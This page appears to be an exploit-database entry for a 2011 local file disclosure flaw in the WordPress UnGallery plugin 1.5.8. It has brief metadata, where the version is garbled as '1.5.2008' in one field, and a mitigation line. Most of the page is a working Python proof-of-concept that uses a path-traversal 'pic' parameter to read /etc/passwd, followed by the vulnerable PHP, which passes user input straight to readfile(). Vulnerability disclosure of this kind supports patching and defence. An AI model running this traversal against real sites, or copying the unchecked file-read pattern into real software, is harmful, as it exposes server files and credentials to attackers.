WordPress UnGallery plugin - exploit.company

vendor:

UnGallery plugin

by:

Miroslav Stampar

N/A

CVSS

HIGH

Local File Disclosure

CWE

Product Name: UnGallery plugin

Affected Version From: 1.5.2008

Affected Version To: 1.5.2008

Patch Exists: NO

Related CWE:

CPE: a:wordpress:ungallery:1.5.8

Metasploit:

Other Scripts:

Platforms Tested:

2011

WordPress UnGallery plugin <= 1.5.8 Local File Disclosure Vulnerability

This exploit allows an attacker to disclose files on the server by manipulating the 'pic' parameter in the source_vuln.php file of the WordPress UnGallery plugin. The attacker can traverse directories and access sensitive files, such as the '/etc/passwd' file in this example.

Mitigation:

The vendor should release a patch or update to fix this vulnerability. In the meantime, users should remove or disable the UnGallery plugin to mitigate the risk.

Source

Exploit-DB raw data:

# Exploit Title: WordPress UnGallery plugin <= 1.5.8 Local File Disclosure Vulnerability
# Date: 2011-08-20
# Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
# Software Link: http://downloads.wordpress.org/plugin/ungallery.1.5.8.zip
# Version: 1.5.8 (tested)

---
PoC
---
#!/bin/python

import urllib2

FILEPATH = "/etc/passwd"

req = urllib2.urlopen("http://www.site.com/wp-content/plugins/ungallery/source_vuln.php?pic=../../../../../../../..%s" % FILEPATH)

print "Filepath: '%s'" % FILEPATH
print "Content: %s" % repr(req.read())

---------------
Vulnerable code
---------------
if ($_GET['pic']) {
	$filename = $_GET['pic'];
	$len = filesize($filename);
	$lastslash =  strrpos($filename, "/");
	$name =  substr($filename, $lastslash + 1);   

	header("Content-type: image/jpeg;\r\n");
	header("Content-Length: $len;\r\n");
	header("Content-Transfer-Encoding: binary;\r\n");
	header('Content-Disposition: inline; filename="'.$name.'"');	//  Render the photo inline.
	readfile($filename);
}